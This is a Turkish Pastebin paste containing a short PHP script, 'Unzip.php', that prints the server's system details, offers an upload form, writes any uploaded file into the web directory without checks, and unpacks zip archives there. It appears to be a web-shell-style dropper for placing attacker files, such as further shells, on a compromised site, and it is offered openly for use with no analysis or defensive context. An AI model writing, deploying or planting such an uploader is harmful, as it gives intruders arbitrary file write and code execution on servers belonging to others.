Pastebin | Pastebin Ekle

Unzip.php zip extract

MecTruy tarafından ... 29.10.2017 - 11:52
|
			<?php 
echo '<b>Sw Bilgi<br><br>'.php_uname().'<br> Yükleyeceğiniz Dosya .zip Olamlıdır.</b> // cikcik'; 
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; 
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; 
if( $_POST['_upl'] == "Upload" ) { 
$file = $_FILES['file']['name']; 
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { 
$zip = new ZipArchive; 
if ($zip->open($file) === TRUE) { 
    $zip->extractTo('./'); 
    $zip->close(); 
echo 'Yükleme Başarılı'; 
} else { 
echo 'Yüklendi Ancak Çıkarma Başarısız.'; 
}     
}else{  
echo '<b>Basarisiz</b><br><br>';  
} 
} 
?>